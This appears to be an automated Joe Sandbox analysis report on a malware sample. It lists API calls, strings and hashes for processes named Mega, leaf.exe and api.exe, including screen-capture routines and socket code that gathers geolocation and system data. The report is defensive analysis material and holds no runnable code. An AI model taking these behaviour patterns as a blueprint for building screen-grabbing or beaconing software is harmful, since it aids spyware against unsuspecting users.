Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004010A6
memset.MSVCRT ref: 00401106
strcmp.MSVCRT ref: 004011B8
strcpy.MSVCRT(?,00000000), ref: 00401206
getenv.MSVCRT ref: 00401243
sprintf.MSVCRT ref: 0040129B
fopen.MSVCRT ref: 004012B0
fwrite.MSVCRT ref: 00401315
fclose.MSVCRT ref: 00401324

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 0040137C

Strings

/ @, xrefs: 004010BE
%s\%s, xrefs: 0040128E, 00401293
! @, xrefs: 004010AE
& @, xrefs: 004010B6

Memory Dump Source

Source File: 00000000.00000002.2036585757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2036548693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2036603684.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2037949080.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mega.jbxd

Similarity

API ID: memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID: ! @$%s\%s$& @$/ @
API String ID: 1891165703-4153036209
Opcode ID: b8bc0b74d28364ce14bffabdb9981fb3b3134ad2479d98d2446ae6e908179b13
Instruction ID: 6225b31dba5bb502cda7e23a87bcd47e15d777aa3482ef3ed33ecdab620989a9
Opcode Fuzzy Hash: b8bc0b74d28364ce14bffabdb9981fb3b3134ad2479d98d2446ae6e908179b13
Instruction Fuzzy Hash: FD81DBF0E001049BEB54DBACCC41B9D77A9EB49308F14417AE50AFB391E639AE45CB69

Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 0040100F

Strings

v@,uz^/&i.q7v>2m:fa:>p/4z&u[h*kc, xrefs: 0040106E

Memory Dump Source

Source File: 00000000.00000002.2036585757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2036548693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2036603684.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2037949080.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mega.jbxd

Similarity

API ID: malloc
String ID: v@,uz^/&i.q7v>2m:fa:>p/4z&u[h*kc
API String ID: 2803490479-1775486065
Opcode ID: 6ad473e3d7fe9158c1acde196af2d92c49358fc5d47a9cc217abf66bd194a4d8
Instruction ID: 01b69ddd6a7163423e12e5d848ef507565a3d8b94cc01782238194285892dabd
Opcode Fuzzy Hash: 6ad473e3d7fe9158c1acde196af2d92c49358fc5d47a9cc217abf66bd194a4d8
Instruction Fuzzy Hash: AF110C74A05248EFCB04CFACD4907ADBBF1AF49308F1480AAE856E7391D635AE41DB45

Function 00401437 Relevance: 2.5, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D`:vD`:v, xrefs: 00401449, 0040144C
D`:vD`:v, xrefs: 00401470, 00401475

Memory Dump Source

Source File: 00000000.00000002.2036585757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2036548693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2036603684.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2037949080.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mega.jbxd

Similarity

API ID: memset$strcmp
String ID: D`:vD`:v$D`:vD`:v
API String ID: 4285334728-3916433284
Opcode ID: 3381f43681460bab8f107108c2fd5181c50eee10433915af29f8995304d91e7d
Instruction ID: ee77992f571a48f282871b5bf01f8c63e07388c962f319f1110e6b87e063dff6
Opcode Fuzzy Hash: 3381f43681460bab8f107108c2fd5181c50eee10433915af29f8995304d91e7d
Instruction Fuzzy Hash: 11F0ACB9A05208EFDB40DFACD981E9E77FCAB48318F104065F948D7351E634EA448B59

Analysis Process: leaf.exePID: 5340, Parent PID: 5572COMMON

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	207
Total number of Limit Nodes:	17

Executed Functions

Function 0119D568 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.2187593367.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1190000_leaf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7160b2b4b76a42044e562f5e83bdf29b9a6156ebda5c4866cc81bdbd64ea9ce0
Instruction ID: 219c344fd9bf31d1a9ef10644852aeb5a5a7b536971f03db48647a306c470fd1
Opcode Fuzzy Hash: 7160b2b4b76a42044e562f5e83bdf29b9a6156ebda5c4866cc81bdbd64ea9ce0
Instruction Fuzzy Hash: 74712670A00B058FEB28DF69E14475ABBF1FF88304F008929D59AD7A50DB74E949CB91

Function 0119F764 Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0119F882

Memory Dump Source

Source File: 00000001.00000002.2187593367.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1190000_leaf.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2795ecbc8caceeb4125bf89c32cc21f05b3b9735de3f4297103895d04bdbd96d
Instruction ID: da28c3d69741944679a104831f6f32e1f6eed8452b0b1731ea074f241717c3e2
Opcode Fuzzy Hash: 2795ecbc8caceeb4125bf89c32cc21f05b3b9735de3f4297103895d04bdbd96d
Instruction Fuzzy Hash: 9F51C0B1D00359AFDF14CF99C984ADEBFB5BF48304F24812AE518AB250D774A845CF91

Function 0119C85C Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0119F882

Memory Dump Source

Source File: 00000001.00000002.2187593367.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1190000_leaf.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 72a4877d6a61e57764eefaab39c62813490d57e817fdd05c98cd84b53b07fe0a
Instruction ID: fe93f9e7dc8a3819468f40372d41b8c5b5d260f24fd57c7380416ce7a0f7596f
Opcode Fuzzy Hash: 72a4877d6a61e57764eefaab39c62813490d57e817fdd05c98cd84b53b07fe0a
Instruction Fuzzy Hash: 7851B2B1D10319AFDF18CF99C984ADDBFB5BF48314F24812AE519AB250D774A845CF90

Function 05274CBC Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 05275991

Memory Dump Source

Source File: 00000001.00000002.2191614361.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5270000_leaf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 134fb69374759968c6f04815d2af4a9587aab724591887c0175657e7041eb758
Instruction ID: bec9d1a6ac98e4cc94edf89d3585f4b4218b05958f96107893e62dc8705a099e
Opcode Fuzzy Hash: 134fb69374759968c6f04815d2af4a9587aab724591887c0175657e7041eb758
Instruction Fuzzy Hash: 3C41EFB0D1061DCBDB24DFA9C884B9DFBF5BF49304F20806AE418AB254DBB56946CF91

Function 052758D6 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 05275991

Memory Dump Source

Source File: 00000001.00000002.2191614361.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5270000_leaf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2fd8ac0fdc4818718ed88405cc4cb8d1c9dc84cb2cd918a89097ce9ce3b0ac5a
Instruction ID: 37202ad2d063a309d952ac38ccbe69b8294dc4f6068d7cdf0accd029d65feaa3
Opcode Fuzzy Hash: 2fd8ac0fdc4818718ed88405cc4cb8d1c9dc84cb2cd918a89097ce9ce3b0ac5a
Instruction Fuzzy Hash: B741E0B0D0061DCBDB24CFA9C884B8DFBB5BF49304F20816AE418AB254DBB55945CF91

Function 0527232E Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 052723C1

Memory Dump Source

Source File: 00000001.00000002.2191614361.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5270000_leaf.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 818fb2bc2a85f78caae0139b944b1d26c0e89c1ac4475092f9ee4648bf7beabb
Instruction ID: 6f8b737f25db7d41ed8f6f0ccd16b65dccb5a5ccb3562a274ef0cf2fefe265d6
Opcode Fuzzy Hash: 818fb2bc2a85f78caae0139b944b1d26c0e89c1ac4475092f9ee4648bf7beabb
Instruction Fuzzy Hash: 47312DB9910209CFDB18CF55C448AAABBF6FF89314F14C459D5199B321D774A841CBA0

Function 01196354 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01197486,?,?,?,?,?), ref: 01197547

Memory Dump Source

Source File: 00000001.00000002.2187593367.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1190000_leaf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ac5ff93b4b9e477ea2f381af01db17a5566e80a1eca90f7f144eb8f40770824c
Instruction ID: d1c90f63032fc83842323b815c4aeddd641896f58f8c9e97dcdbc07bbf9115a2
Opcode Fuzzy Hash: ac5ff93b4b9e477ea2f381af01db17a5566e80a1eca90f7f144eb8f40770824c
Instruction Fuzzy Hash: 5521E3B59002489FDB10CF9AD984AEEBFF8FF48310F14801AE918A3350D378A954CFA5

Function 011974B8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01197486,?,?,?,?,?), ref: 01197547

Memory Dump Source

Source File: 00000001.00000002.2187593367.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1190000_leaf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a75ea1e39edc804a69490723163c87452754737dfb1f0909973ff75ba2954de9
Instruction ID: df7ce9463d482666451e572b06ca0b9493a94b52183bf6d387cb3207f227bf5f
Opcode Fuzzy Hash: a75ea1e39edc804a69490723163c87452754737dfb1f0909973ff75ba2954de9
Instruction Fuzzy Hash: 3921E5B59002489FDB10CF9AD985ADEBFF4FB48310F14841AE918A3350D378A954CFA0

Function 0119C6D0 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0119D839,00000800,00000000,00000000), ref: 0119DA4A

Memory Dump Source

Source File: 00000001.00000002.2187593367.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1190000_leaf.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 57906048e94eff25edf71129bc8d17e4f06713f59ad31c4be16581c2d3aa0ab9
Instruction ID: 0440faf8e887600e6218b98d812ae3d186a5471fe3c473f5108f94f0c7df2d37
Opcode Fuzzy Hash: 57906048e94eff25edf71129bc8d17e4f06713f59ad31c4be16581c2d3aa0ab9
Instruction Fuzzy Hash: 712138B68043488FDB14DFAAD544ADEBBF4EF89310F14806AD559A7210C778A944CFA5

Function 0119C6E8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0119D839,00000800,00000000,00000000), ref: 0119DA4A

Memory Dump Source

Source File: 00000001.00000002.2187593367.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1190000_leaf.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: faaa217baa8e92b82964b82dd7fc54467c5f4c1bcb09e6b738cc60e2457babc7
Instruction ID: 2d3e2e80f442056073cd17ed4ca7df590d9db2c49f573eef9dac2447983b0962
Opcode Fuzzy Hash: faaa217baa8e92b82964b82dd7fc54467c5f4c1bcb09e6b738cc60e2457babc7
Instruction Fuzzy Hash: A71114B69043088FDB14DF9AD544BDEFBF4EB88310F10842AE529A7200C379A944CFA5

Function 0119D9D8 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0119D839,00000800,00000000,00000000), ref: 0119DA4A

Memory Dump Source

Source File: 00000001.00000002.2187593367.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1190000_leaf.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c09e924d45b9aa5ac4c32d873be23d6977706d36b307a8d7672febafb7ec8e35
Instruction ID: 0c0b2d3bf808830aaa99afda48cc5f0b84f22b9c7a8fcb7910b5d84fbf59e08a
Opcode Fuzzy Hash: c09e924d45b9aa5ac4c32d873be23d6977706d36b307a8d7672febafb7ec8e35
Instruction Fuzzy Hash: 8411E2B6D002498FDB14CFAAD544ADEFBF4AB48310F14841AE929B7700C779A645CFA5

Function 0119C690 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0119D584), ref: 0119D7BE

Memory Dump Source

Source File: 00000001.00000002.2187593367.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1190000_leaf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1fe2363b4831cce676140b73b4d3e296210faa0e9d014b24ca326d0c5867064d
Instruction ID: 0db8e7c6cec36b8ed6a308efe8870b924779429f540259c36285d3486cd6a339
Opcode Fuzzy Hash: 1fe2363b4831cce676140b73b4d3e296210faa0e9d014b24ca326d0c5867064d
Instruction Fuzzy Hash: 451132B5C006888FCF18DF9AD544A9EFBF4EB88214F10842AD528B7600C378A545CFA1

Function 0112D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2187022163.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_112d000_leaf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87e19859f0aa8ba277f572ddb344637aa982cf772740a99665914e4339f839fe
Instruction ID: 7a98a9d16c8a5258b34bf49e2731648b1345f32639be525e2fc4d505621fd101
Opcode Fuzzy Hash: 87e19859f0aa8ba277f572ddb344637aa982cf772740a99665914e4339f839fe
Instruction Fuzzy Hash: FF212571504244DFDF09DF98E9C4F26BFB5FB88318F208569E9090B256C37AD466CBA2

Function 0113D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2187129526.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_113d000_leaf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0d809510cc20ac39f7aa30ac5b89e1e131c8130c44d6a83526c3d3771e1d837
Instruction ID: 2456ac1a711542b6a8c08dd6a2dd9f23748b3e8802c4df2f38752fda8ec2260b
Opcode Fuzzy Hash: c0d809510cc20ac39f7aa30ac5b89e1e131c8130c44d6a83526c3d3771e1d837
Instruction Fuzzy Hash: BB21F571504204DFDF09DFA8E5C0B26BF65FBC4324F60C56DE9494B25AC33AD406CA62

Function 0113D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2187129526.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_113d000_leaf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f196911d6aefb393f784555fa402cdfd4837248b0c169bf2f972271054869c95
Instruction ID: 3c59d1c46d7b31c557343b6598e98a018db98aa733ef74847803c38939afd89e
Opcode Fuzzy Hash: f196911d6aefb393f784555fa402cdfd4837248b0c169bf2f972271054869c95
Instruction Fuzzy Hash: 21210071604200DFDF19DFA8E980B26FF65FB88714F60C569E94A0B25AC33AD406CA62

Function 0113D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2187129526.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_113d000_leaf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed2abb2bccde7827d42c7a59aaa43e8ed39c4d52164bd8b83b7af2a007c4d36e
Instruction ID: e594d8c0af72ccea2959db82aed2301ebf81e5510725d091c75516d2b0c390fd
Opcode Fuzzy Hash: ed2abb2bccde7827d42c7a59aaa43e8ed39c4d52164bd8b83b7af2a007c4d36e
Instruction Fuzzy Hash: 8B2180755083809FCB07CF64D994B11BF71FB86214F28C5DAD8498F2A7C33A981ACB62

Function 0112D4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2187022163.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_112d000_leaf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: fd74f3300a6ea5ec899d7a35e102689914f4b2f4fd2e1ffd4c8bc63c7a057636
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 0811AF76504280CFDF16CF54D5C4B16BF71FB88314F2486A9D9094B256C33AD46ACBA2

Function 0113D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2187129526.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_113d000_leaf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 17b54801c864de75d7154d06222c8082f6f2a159f9a8cf82ccb559cb4fd377cf
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 9111BB75504280DFDB06CF54D5C4B15BFA1FB84224F24C6A9E8494B29AC33AD40ACB62

Non-executed Functions

Function 0119DC60 Relevance: .5, Instructions: 525COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2187593367.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1190000_leaf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95d3dc02fbb912b63e06f5cf9cb159af830de5a7baf3bf248c7823219f953cb5
Instruction ID: e0d081aa5ae8cf95a46241b5a4e79db63abec29a71bf288fb9e0707866a20e64
Opcode Fuzzy Hash: 95d3dc02fbb912b63e06f5cf9cb159af830de5a7baf3bf248c7823219f953cb5
Instruction Fuzzy Hash: 49528CB4529705CFFB14CF18E8AA1997FB2FB40B18F924609E1615B2E1DBB465CACF40

Function 0119C4D4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2187593367.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1190000_leaf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d86a4cfd860e4efac02929c862a7d14f4cb3b6c5fe18f3022939e3d90da252ba
Instruction ID: c572e1b001c0177fd3bc78b4cbbdcf5af49577f998c313f37a331dd083f81c9b
Opcode Fuzzy Hash: d86a4cfd860e4efac02929c862a7d14f4cb3b6c5fe18f3022939e3d90da252ba
Instruction Fuzzy Hash: F9A16F32F00216CFDF19DFB4C94069EBBB2FF85304B15456AE916AB261DB31E955CB80

Analysis Process: api.exePID: 5656, Parent PID: 5572COMMON

Execution Graph

Execution Coverage:	12%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.2%
Total number of Nodes:	1580
Total number of Limit Nodes:	89

Executed Functions

Function 00DE0840 Relevance: 42.3, APIs: 28, Instructions: 334
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(0000004C), ref: 00DE0894
GetSystemMetrics.USER32(0000004D), ref: 00DE089E
GetSystemMetrics.USER32(0000004E), ref: 00DE08A8
GetSystemMetrics.USER32(0000004F), ref: 00DE08B2
GetDC.USER32(00000000), ref: 00DE08B8
GetDeviceCaps.GDI32(00000000,00000008), ref: 00DE08CD
GetDeviceCaps.GDI32(?,0000000A), ref: 00DE08D9
CreateCompatibleDC.GDI32(?), ref: 00DE08E3
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 00DE08F8
SelectObject.GDI32(?,00000000), ref: 00DE090C
BitBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,40CC0020), ref: 00DE0936
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00DE097C

Part of subcall function 00DDE4B0: InitializeCriticalSectionEx.KERNEL32(00E38A08,00000000,00000000), ref: 00DDE502
Part of subcall function 00DDE4B0: GetLastError.KERNEL32 ref: 00DDE50C

EnterCriticalSection.KERNEL32(00000004), ref: 00DE09C0
LeaveCriticalSection.KERNEL32(00000004), ref: 00DE09CA
GetObjectW.GDI32(?,00000054,?), ref: 00DE09E7
IStream_Size.SHLWAPI(00000000,?,00000000), ref: 00DE0AA2
IStream_Reset.SHLWAPI(00000000), ref: 00DE0AB1
IStream_Read.SHLWAPI(00000000,00000000,?), ref: 00DE0B05
SelectObject.GDI32(?,?), ref: 00DE0C09
DeleteDC.GDI32(?), ref: 00DE0C10
ReleaseDC.USER32(00000000,?), ref: 00DE0C1E
DeleteObject.GDI32(?), ref: 00DE0C30
DeleteObject.GDI32(?), ref: 00DE0C56
EnterCriticalSection.KERNEL32(00000004,?), ref: 00DE0C69
EnterCriticalSection.KERNEL32(00000004), ref: 00DE0C72
GdiplusShutdown.GDIPLUS(00000000), ref: 00DE0C7B
LeaveCriticalSection.KERNEL32(00000004), ref: 00DE0C8E
LeaveCriticalSection.KERNEL32(00000004), ref: 00DE0C99

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: CriticalSection$Object$CreateDeleteEnterLeaveMetricsStream_System$CapsCompatibleDeviceSelect$BitmapCallbackDispatcherErrorGdiplusGlobalInitializeLastReadReleaseResetShutdownSizeStreamUser
String ID:
API String ID: 3293131912-0
Opcode ID: e4c4401eaee67c6478339fbb5d12163eccebd0ff093834eedbe4155dda4b7073
Instruction ID: 0d7c47008cdc4ff24b92e6e6b70d5e78bc1f00bd7e2925ac3a4b5baec438fef4
Opcode Fuzzy Hash: e4c4401eaee67c6478339fbb5d12163eccebd0ff093834eedbe4155dda4b7073
Instruction Fuzzy Hash: 98D15971D00219DFDB20DFA5CC49BEEBBB4EB49300F1045A9E509B7291DBB45A85CFA0

Function 00DDF190 Relevance: 23.2, APIs: 7, Strings: 6, Instructions: 456
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DE05B0: GetUserGeoID.KERNEL32(00000010), ref: 00DE05E5
Part of subcall function 00DE05B0: GetGeoInfoA.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00DE05F7
Part of subcall function 00DE05B0: GetGeoInfoA.KERNEL32(?,00000004,?,00000000,00000000), ref: 00DE064F

WSAStartup.WS2_32(00000202,00E36B1C), ref: 00DDF285
socket.WS2_32(00000002,00000001,00000000), ref: 00DDF294
htons.WS2_32(00000002), ref: 00DDF2B7
inet_pton.WS2_32(00000002,00E389A0,00E36CB0), ref: 00DDF2DE
connect.WS2_32(00E36CAC,00000010), ref: 00DDF2F1
closesocket.WS2_32 ref: 00DDF302

Part of subcall function 00E0F774: EnterCriticalSection.KERNEL32(00E37D34,?,?,00DDF72D,00E38A78,?,?,?), ref: 00E0F77E
Part of subcall function 00E0F774: LeaveCriticalSection.KERNEL32(00E37D34,?,?,00DDF72D,00E38A78,?,?,?), ref: 00E0F7B1
Part of subcall function 00E0F774: RtlWakeAllConditionVariable.NTDLL ref: 00E0F828

WSACleanup.WS2_32 ref: 00DDF308

Strings

geo, xrefs: 00DDF222
system, xrefs: 00DDF1D6
type must be string, but is , xrefs: 00DDFBBA
`p, xrefs: 00DDF39E
pp, xrefs: 00DDF349
j, xrefs: 00DDF359

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: CriticalInfoSection$CleanupConditionEnterLeaveStartupUserVariableWakeclosesocketconnecthtonsinet_ptonsocket
String ID: `p$geo$pp$system$type must be string, but is $j
API String ID: 3108621024-1391336215
Opcode ID: 072e3978b8529082074ba695553394648c1814a43678ba42bdcc8a7b08d97ac8
Instruction ID: f4b7bfeb44c5e9f57ecbc230d96ed5c32521a55a4cb7393f7381706b3270c817
Opcode Fuzzy Hash: 072e3978b8529082074ba695553394648c1814a43678ba42bdcc8a7b08d97ac8
Instruction Fuzzy Hash: 55128C709003189BDB15DF68DC99BEDBBB1EF49300F1482AAE44AB7391DB315A85CB61

Function 00DDFC60 Relevance: 18.6, APIs: 12, Instructions: 550
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

recv.WS2_32(?,00000001,00000000,00E389BC), ref: 00DDFDA4
closesocket.WS2_32(00000214), ref: 00DDFDB4
WSACleanup.WS2_32 ref: 00DDFDBA

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
